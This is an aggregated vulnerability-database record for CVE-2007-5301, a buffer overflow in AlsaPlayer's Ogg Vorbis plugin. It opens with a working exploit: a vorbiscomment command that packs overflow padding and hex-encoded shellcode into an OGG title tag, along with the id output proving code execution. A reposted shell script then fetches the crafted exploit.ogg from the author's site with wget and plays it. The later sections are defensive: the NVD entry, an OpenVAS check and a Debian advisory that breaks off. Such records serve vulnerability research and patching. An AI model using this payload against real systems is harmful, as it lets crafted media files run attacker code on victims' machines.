Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit
2008-04-10T00:00:00
ID EDB-ID:5424 Type exploitdb Reporter Albert Sellares Modified 2008-04-10T00:00:00
Description
Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit. CVE-2007-5301. Local exploit for linux platform
I have released this exploit for the alsaplayer bug CVE-2007-5301.
You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/
With my modified version of vorbiscomment, you can generate a ogg exploit like this:
whats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print "AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\x77\xe7
\xff\xff\x08\x08\x08\x08\x29\xc9\x83\xe9\xf4\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e
\x46\x90\xbe\x13\x83\xee\xfc\xe2\xf4\x2c\x9b\xe6\x8a\x14\xf6\xd6\x3e\x25\x19\x59\x7b
\x69\xe3\xd6\x13\x2e\xbf\xdc\x7a\x28\x19\x5d\x41\xae\x9c\xbe\x13\x46\xbf\xcb\x60\x34
\xbf\xdc\x7a\x28\xbf\xd7\x77\x46\xc7\xed\x9a\xa7\x5d\x3e\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg
Then, if you plays the file with the vulnerable version:
whats@debian:~$ alsaplayer exploit.ogg
uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
This was tested with the debian etch packages.
- whats
# milw0rm.com [2008-04-10]
{"id": "EDB-ID:5424", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit", "description": "Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit. CVE-2007-5301. Local exploit for linux platform", "published": "2008-04-10T00:00:00", "modified": "2008-04-10T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5424/", "reporter": "Albert Sellares", "references": [], "cvelist": ["CVE-2007-5301"], "lastseen": "2016-01-31T23:06:14", "viewCount": 4, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-01-31T23:06:14", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5301"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8888", "SECURITYVULNS:DOC:19617"]}, {"type": "exploitdb", "idList": ["EDB-ID:30648"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1538-1:32D1F"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EC45CE53D720F233296DC2F925C00A11"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:65385"]}, {"type": "seebug", "idList": ["SSV:8307", "SSV:65318"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1538.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:60785"]}], "modified": "2016-01-31T23:06:14", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/5424/", "sourceData": "I have released this exploit for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\r\n\r\nwhats@debian:~$ vorbiscomment.whats -w -t \"TITLE=$(perl -e 'print \"AAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\r\n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\r\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\r\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\r\n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13\"')\" /usr/share/games/pydance/sound/back.ogg exploit.ogg \r\n\r\nThen, if you plays the file with the vulnerable version:\r\n\r\nwhats@debian:~$ alsaplayer exploit.ogg\r\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n\r\nThis was tested with the debian etch packages.\r\n\r\n- whats\r\n\r\n# milw0rm.com [2008-04-10]\r\n", "osvdbidlist": []}
{"cve": [{"lastseen": "2020-12-09T19:26:08", "description": "Buffer overflow in the vorbis_stream_info function in input/vorbis/vorbis_engine.c (aka the vorbis input plugin) in AlsaPlayer before 0.99.80-rc3 allows remote attackers to execute arbitrary code via a .OGG file with long comments.", "edition": 5, "cvss3": {}, "published": "2007-10-09T18:17:00", "title": "CVE-2007-5301", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2007-5301"], "modified": "2018-10-15T21:42:00", "cpe": ["cpe:/a:alsaplayer:alsaplayer:0.99.80-rc2"], "id": "CVE-2007-5301", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5301", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:alsaplayer:alsaplayer:0.99.80-rc2:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:25", "bulletinFamily": "software", "cvelist": ["CVE-2007-5301"], "description": "Hello,\r\n\r\nI have released this PoC for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\n#!/bin/sh\r\n#\r\n# http://www.wekk.net/research/CVE-2007-5301/CVE-2007-5301-exploit.sh\r\n#\r\n# Exploit for alsaplayer before 0.99.80-rc3. Tested with the debian etch package \r\n# alsaplayer-common at version 0.99.76-9\r\n#\r\n# CVE-2007-5301 / DSA-1538\r\n# \r\n# by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net\r\n# 2008-04-09\r\n#\r\n# Shellcode is based on metasploit framework. If you want to test it in other \r\n# systems, maybe you have to recalculate offsets.\r\n#\r\n# Example:\r\n# \r\n# whats@debian:~$ ./CVE-2007-5301-exploit.sh\r\n# Alsaplayer buffer overflow < 0.99.80-rc3\r\n# by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net\r\n#\r\n#\r\n# --12:19:27-- http://www.wekk.net/research/CVE-2007-5301/exploit.ogg\r\n# => `exploit.ogg'\r\n# Resolving www.wekk.net... 64.22.71.90\r\n# Connecting to www.wekk.net|64.22.71.90|:80... connected.\r\n# HTTP request sent, awaiting response... 200 OK\r\n# Length: 5,421 (5.3K) [application/ogg]\r\n# \r\n# 100%[===============================================================================>] 5,421 \r\n# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]\r\n# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n#\r\n\r\necho -e "Alsaplayer buffer overflow < 0.99.80-rc3"\r\necho -e "by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net\n\n"\r\nwget http://www.wekk.net/research/CVE-2007-5301/exploit.ogg\r\nalsaplayer exploit.ogg\r\n\r\n\r\n\r\n-- \r\n Albert Sellares GPG id: 0x13053FFE\r\n http://www.wekk.net whats_up@jabber.org \r\n Membre de Catux.org http://catux.org \r\n Linux User: 324456 Catalunya \r\n", "edition": 1, "modified": "2008-04-10T00:00:00", "published": "2008-04-10T00:00:00", "id": "SECURITYVULNS:DOC:19617", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19617", "title": "[CVE-2007-5301] alsaplayer PoC - exploit", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-5301"], "description": "Buffer overflow on oversized .ogg comment.", "edition": 1, "modified": "2008-04-10T00:00:00", "published": "2008-04-10T00:00:00", "id": "SECURITYVULNS:VULN:8888", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8888", "title": "AlsaPlayer buffer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5301"], "description": "The remote host is missing an update to alsaplayer\nannounced via advisory DSA 1538-1.", "modified": "2017-07-07T00:00:00", "published": "2008-04-21T00:00:00", "id": "OPENVAS:60785", "href": "http://plugins.openvas.org/nasl.php?oid=60785", "type": "openvas", "title": "Debian Security Advisory DSA 1538-1 (alsaplayer)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1538_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1538-1 (alsaplayer)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Erik Sj\u00f6lund discovered a buffer overflow vulnerability in the Ogg\nVorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a\nmaliciously-crafted Vorbis file could lead to the execution of\narbitrary code.\n\nFor the stable distribution (etch), the problem has been fixed in\nversion 0.99.76-9+etch1.\n\nFor the unstable distribution (sid), the problem was fixed in version\n0.99.80~rc4-1.\n\nWe recommend that you upgrade your alsaplayer packages.\";\ntag_summary = \"The remote host is missing an update to alsaplayer\nannounced via advisory DSA 1538-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201538-1\";\n\n\nif(description)\n{\n script_id(60785);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-04-21 20:40:14 +0200 (Mon, 21 Apr 2008)\");\n script_cve_id(\"CVE-2007-5301\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1538-1 (alsaplayer)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"alsaplayer-alsa\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-xosd\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-daemon\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-jack\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-oss\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-common\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-esd\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-nas\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-gtk\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libalsaplayer0\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libalsaplayer-dev\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-text\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T12:48:10", "description": "AlsaPlayer 0.99.x Vorbis Input Plug-in OGG Processing Remote Buffer Overflow Vulnerability. CVE-2007-5301. Dos exploit for linux platform", "published": "2007-10-08T00:00:00", "type": "exploitdb", "title": "AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2007-10-08T00:00:00", "id": "EDB-ID:30648", "href": "https://www.exploit-db.com/exploits/30648/", "sourceData": "source: http://www.securityfocus.com/bid/25969/info\r\n\r\nAlsaPlayer is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.\r\n\r\nExploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected application.\r\n\r\nThis issue affects versions prior to AlsaPlayer 0.99.80-rc3. \r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30648.ogg", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/30648/"}], "packetstorm": [{"lastseen": "2016-12-05T22:22:16", "description": "", "published": "2008-04-10T00:00:00", "type": "packetstorm", "title": "alsaplayer-overflow.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2008-04-10T00:00:00", "id": "PACKETSTORM:65385", "href": "https://packetstormsecurity.com/files/65385/alsaplayer-overflow.txt.html", "sourceData": "`I have released this exploit for the alsaplayer bug CVE-2007-5301. \n \nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/ \n \nWith my modified version of vorbiscomment, you can generate a ogg exploit like this: \n \nwhats@debian:~$ vorbiscomment.whats -w -t \"TITLE=$(perl -e 'print \"AAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7 \n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e \n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b \n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34 \n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13\"')\" /usr/share/games/pydance/sound/back.ogg exploit.ogg \n \nThen, if you plays the file with the vulnerable version: \n \nwhats@debian:~$ alsaplayer exploit.ogg \nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats) \n \nThis was tested with the debian etch packages. \n \n- whats \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/65385/alsaplayer-overflow.txt"}], "debian": [{"lastseen": "2020-11-11T13:16:37", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5301"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1538-1 security@debian.org\nhttp://www.debian.org/security/ Devin Carraway\nApril 04, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : alsaplayer\nVulnerability : buffer overrun\nProblem type : local (remote)\nDebian-specific: no\nCVE Id(s) : CVE-2007-5301\nDebian Bug : 446034\n\nErik Sj\u00c3\u00b6lund discovered a buffer overflow vulnerability in the Ogg\nVorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a\nmaliciously-crafted Vorbis file could lead to the execution of\narbitrary code.\n\nFor the stable distribution (etch), the problem has been fixed in\nversion 0.99.76-9+etch1.\n\nFor the unstable distribution (sid), the problem was fixed in version\n0.99.80~rc4-1.\n\nWe recommend that you upgrade your alsaplayer packages.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer_0.99.76-9+etch1.dsc\n Size/MD5 checksum: 1411 f1cef8ce08af0bc84cc18f45bf54774b\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer_0.99.76-9+etch1.diff.gz\n Size/MD5 checksum: 179628 f2af0197803ce618482ecdc6c78b420e\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 27560 e1b68d62513e27add20da78f6820b1f4\n 